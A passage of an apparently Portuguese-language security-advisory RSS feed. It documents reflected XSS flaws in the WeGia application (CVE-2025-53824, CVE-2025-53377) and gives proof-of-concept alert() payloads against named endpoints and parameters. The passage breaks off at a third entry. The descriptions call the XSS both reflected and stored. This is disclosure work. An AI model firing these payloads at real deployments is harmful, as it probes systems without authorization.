&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 14 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53824</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53824/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53824/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53824-cross-site-scripting-xss-refletido-no-endpoint-cadastro_petphp-parâmetro-msg&amp;#34;&amp;gt;CVE-2025-53824: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53824-cross-site-scripting-xss-refletido-no-endpoint-cadastro_petphp-parâmetro-msg&amp;#34;&amp;gt;CVE-2025-53824: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53824&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_pet.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET html/pet/cadastro_pet.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;msg&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;;alert(String.fromCharCode(88,83,83))//&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nb&amp;#34;&amp;gt;String&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;fromCharCode&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;88&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;83&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;))&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;c1&amp;#34;&amp;gt;//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//&amp;amp;#34;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;amp;#39;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53824/image.png&amp;#34;
	width=&amp;#34;909&amp;#34;
	height=&amp;#34;195&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53824/image_hu_dab014e19e118e64.png 480w, /p/cve-2025-53824/image_hu_9c6c930cedafbd51.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;466&amp;#34;
		data-flex-basis=&amp;#34;1118px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-86r7-gc8h-63gh&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradores&amp;#34;&amp;gt;Colaboradores
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 14 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53377</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53377/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53377/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53377-cross-site-scripting-xss-refletido-no-endpoint-cadastro_dependente_pessoa_novaphp-parâmetro-id_funcionario&amp;#34;&amp;gt;CVE-2025-53377: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53377-cross-site-scripting-xss-refletido-no-endpoint-cadastro_dependente_pessoa_novaphp-parâmetro-id_funcionario&amp;#34;&amp;gt;CVE-2025-53377: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53377&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/funcionario/cadastro_dependente_pessoa_nova.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1337&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53377/image.png&amp;#34;
	width=&amp;#34;783&amp;#34;
	height=&amp;#34;830&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53377/image_hu_916b39df13121479.png 480w, /p/cve-2025-53377/image_hu_be592415902b7b4b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;94&amp;#34;
		data-flex-basis=&amp;#34;226px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qgrq-qjq6-h6gj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53525</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53525/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53525/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53525-cross-site-scripting-xss-refletido-no-endpoint-profile_familiarphp-parâmetro-id_dependente&amp;#34;&amp;gt;CVE-2025-53525: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
